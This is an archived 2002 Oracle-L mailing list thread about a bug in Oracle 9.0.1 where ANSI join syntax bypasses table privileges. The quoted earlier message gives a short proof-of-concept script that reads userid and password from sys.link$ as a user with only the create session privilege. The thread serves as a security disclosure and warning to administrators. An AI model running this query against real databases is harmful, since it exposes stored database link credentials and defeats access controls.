Oracle FAQ Your Portal to the Oracle Knowledge Grid
HOME | ASK QUESTION | ADD INFO | SEARCH | E-MAIL US
 

Home -> Community -> Mailing Lists -> Oracle-L -> Re: Security Hole

Re: Security Hole

From: Jonathan Lewis <jonathan_at_jlcomp.demon.co.uk>
Date: Tue, 16 Apr 2002 06:13:27 -0800
Message-ID: <F001.00445337.20020416061327@fatcity.com> 






Oracle 9 only.


Oracle 8 does not support ANSI join syntax.



Jonathan Lewis


http://www.jlcomp.demon.co.uk



Author of:


Practical Oracle 8i: Building Efficient Databases



Next Seminar - Australia - July/August


http://www.jlcomp.demon.co.uk/seminar.html



Host to The Co-Operative Oracle Users' FAQ
http://www.jlcomp.demon.co.uk/faq/ind_faq.html





-----Original Message-----


To: Multiple recipients of list ORACLE-L <ORACLE-L_at_fatcity.com>
Date: 16 April 2002 13:47




|Is this on 9i databases or is 8 involved?  Ruth

|----- Original Message -----

|To: "Multiple recipients of list ORACLE-L" <ORACLE-L_at_fatcity.com>

|Sent: Tuesday, April 16, 2002 7:33 AM

|

|

|> This just in from comp.databases.oracle.server.

|>

|> See metalink bug 2121935.

|>

|> Using ANSI syntax joins (CROSS JOIN, LEFT OUTER etc)

|> allows you to view data from tables on which you have no

|> privilege.  For example, try this COMPLETE script:

|>

|> connect / as sysdba

|> create user us1 identified by us1;

|> grant create session to us1;

|>

|> connect us1/us1

|>

|> select userid, password

|> from

|>         sys.link$ cross join dual

|> ;

|>

|>

|>

|> Worse still, if you have the privilege to create views

|> then this loophole allows you to seek and destroy

|> ANY DATA in the database that you might want to.

|>

|> The bug is fixed in 9iR2.  I didn't see any note

|> about a backport, or a security alert on OTN.

|>

|> Conclusion:

|>

|>     9.0.1 should not be in use on production system

|>     until Oracle supplies a fix.

|>





-- 
Please see the official ORACLE-L FAQ: http://www.orafaq.com
-- 
Author: Jonathan Lewis
  INET: jonathan_at_jlcomp.demon.co.uk

Fat City Network Services    -- (858) 538-5051  FAX: (858) 538-5051
San Diego, California        -- Public Internet access / Mailing Lists
--------------------------------------------------------------------
To REMOVE yourself from this mailing list, send an E-Mail message
to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in
the message BODY, include a line containing: UNSUB ORACLE-L
(or the name of mailing list you want to be removed from).  You may
also send the HELP command for other information (like subscribing).


Received on Tue Apr 16 2002 - 09:13:27 CDT












Original text of this message













  HOME |
  ASK QUESTION |
  ADD INFO |
  SEARCH |
  E-MAIL US